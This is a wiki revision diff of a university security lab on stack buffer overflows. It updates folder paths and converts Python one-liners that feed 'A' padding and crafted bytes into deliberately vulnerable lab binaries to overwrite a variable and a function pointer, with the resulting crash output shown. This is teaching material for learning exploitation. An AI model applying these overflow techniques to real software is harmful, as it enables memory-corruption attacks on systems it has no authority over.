Show page

Differences

This shows you the differences between two versions of the page.

--- cns:labs:lab-03 [2020/10/25 13:38]
mihai.dumitru2201 [1. Assembly Function Calls]
+++ cns:labs:lab-03 [2022/10/24 19:05] (current)
mihai.dumitru2201 [2. Overflow a Pointer]
@@ Line 84: / Line 84: @@
 ==== 1. Assembly Function Calls  ====
-Enter the ''asm-function-call/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code>
+Enter the ''01-asm-function-call/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code>
 student@host:~/cns/labs/03-stack-buffer-management/01-asm-function-call $ ls
 Makefile  function_call.asm
@@ Line 113: / Line 113: @@
 ==== 2. Overflow a Pointer ====
-Enter the ''owerflow-ptr/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code>
+Enter the ''02-owerflow-ptr/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it:<code>
-student@host:~/lab-03/overflow-ptr$ ls
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ ls
 Makefile  overflow_ptr.c
-student@host:~/lab-03/overflow-ptr$ make
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ make
 gcc -Wall -Wextra -Wno-unused-function -g -O0 -fno-stack-protector  -no-pie -c -o overflow_ptr.o overflow_ptr.c
 gcc overflow_ptr.o   -o overflow_ptr -no-pie
-student@host:~/lab-03/overflow-ptr$ ls
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ ls
 Makefile  overflow_ptr  overflow_ptr.c  overflow_ptr.o
-student@host:~/lab-03/overflow-ptr$ ./overflow_ptr
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ ./overflow_ptr
 Provide buffer input: aaaa
 Dumb number value is 0x12345678.
@@ Line 134: / Line 134: @@
 Let's first automate the delivery of input to the buffer by using Python. Let's write 16 bytes of ''A'' characters:<code>
-python -c 'print 16*"A"' | ./overflow_ptr
+python -c 'import sys; sys.stdout.buffer.write(16*b"A")' | ./overflow_ptr
 Provide buffer input: Dumb number value is 0x12345678.
 Buffer is AAAAAAAAAAAAAAAA
@@ Line 143: / Line 143: @@
 Let's now increase the number of bytes we are writing to 30, then 35, then 36:<code>
-student@host:~/lab-03/overflow-ptr$ python -c 'print 30*"A"' | ./overflow_ptr
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(30*b"A")' | ./overflow_ptr
 Provide buffer input: Dumb number value is 0x12345678.
 Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Knock, knock! Who's there? Recursion. Recursion who? Knock, knock!
-student@host:~/lab-03/overflow-ptr$ python -c 'print 35*"A"' | ./overflow_ptr
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(35*b"A")' | ./overflow_ptr
 Provide buffer input: Dumb number value is 0x12345600.
 Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Knock, knock! Who's there? Recursion. Recursion who? Knock, knock!
-student@host:~/lab-03/overflow-ptr$ python -c 'print 36*"A"' | ./overflow_ptr
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(36*b"A")' | ./overflow_ptr
 Provide buffer input: Dumb number value is 0x1234000a.
 Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@@ Line 167: / Line 167: @@
 Now let's try to write more, let's go one byte after the ''dumb_number variable'' by writing 39 bytes: 36 bytes for the buffer, 3 bytes for the ''dumb_number'' variable, 1 byte for the newline and one byte for the NUL-byte going further than the ''dumb_number'' variable:<code>
-student@host:~/lab-03/overflow-ptr$ python -c 'print 39*"A"' | ./overflow_ptr
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(39*b"A")' | ./overflow_ptr
 Provide buffer input: Dumb number value is 0x0a414141.
 Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
@@ Line 173: / Line 173: @@
 Let's see what happens if we overwrite more data, we write ''41'' bytes:<code>
-student@host:~/lab-03/overflow-ptr$ python -c 'print 41*"A"' | ./overflow_ptr
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ python -c 'import sys; sys.stdout.buffer.write(41*b"A")'  | ./overflow_ptr
 Provide buffer input: Dumb number value is 0x41414141.
 Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Segmentation fault
-student@host:~/lab-03/overflow-ptr$ dmesg
+student@host:~/cns/labs/03-stack-buffer-management/02-overflow-ptr $ dmesg
 [...]
 [11400.357883] overflow_ptr[13573]: segfault at a41 ip 0000000000000a41 sp 00007ffd94ac96f8 error 14 in overflow_ptr[400000+1000]
@@ Line 186: / Line 186: @@
 We now see that we've overwritten three bytes of the ''f_ptr'' function pointer that we jump to: ''0x00'' (the NUL byte), ''0x0a'' (the newline), and ''0x41'' (one of the 41 ''A'' characters we've written).
-Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable:<code>
+Let's see how we could write some random hex data. Let's overwrite the ''dumb_number'' value with ''0x87654321'', that is the reverse of how it currently is. We will write ''32'' bytes of ''A'' and another eight properly arranged bytes to overwrite the ''dumb_number'' variable:
-$ python -c 'print 32*"A" + "\x00\x00\x00\x00\x21\x43\x65\x87"' | ./overflow_ptr
+<code>
+$ python -c 'import sys; sys.stdout.buffer.write(32*b"A" + b"\x21\x43\x65\x87\x00\x00\x00\x00")' | ./overflow_ptr
 Provide buffer input: Dumb number value is 0x87654321.
@@ Line 229: / Line 231: @@
 ==== 3. Off-by-one Overflow  ====
-Enter the ''off-by-one/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it.
+Enter the ''03-off-by-one/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it.
 Analyze the binary and source code file and spot the bug.
@@ Line 244: / Line 246: @@
 Same as before, but make it display %%"Very bad."%%
-==== 5. Overflow an Address  ====
+====  4. Overflow an Address  ====
-Enter the ''overflow-address/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it.
+Enter the ''04-overflow-address/'' subfolder in the lab archive folder. Check the source code so far. Compile it and run it.
 Analyze the binary and source code file and spot the bug. Trigger a ''SIGSEGV'' with a long enough input.
@@ Line 265: / Line 267: @@
   *[[https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64|x64 stack frame tutorial]]
-  *[[https://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/|x32 stack frame tutorial]]
+  *[[https://eli.thegreenplace.net/2011/02/04/where-the-top-of-the-stack-is-on-x86/|x86 stack frame tutorial]]
   *[[http://security.cs.pub.ro/hexcellents/wiki/|Hexcellents - A collection of binary exploitation resources]]
-  * ''%%python -c 'print "A" * 42' | ./l33tb1n%%''
+  * ''%%python -c 'import sys; sys.stdout.buffer.write(b"A" * 42 + b"\x44\x33\x22\x11")' | ./l33tb1n%%''
   * objdump
   * GDB
   * strace
   * ltrace

Resources

Labs

Lectures

Assignments

Extra

cns/labs/lab-03.1603625899.txt.gz · Last modified: 2020/10/25 13:38 by mihai.dumitru2201

Show page Old revisions

Media Manager Back to top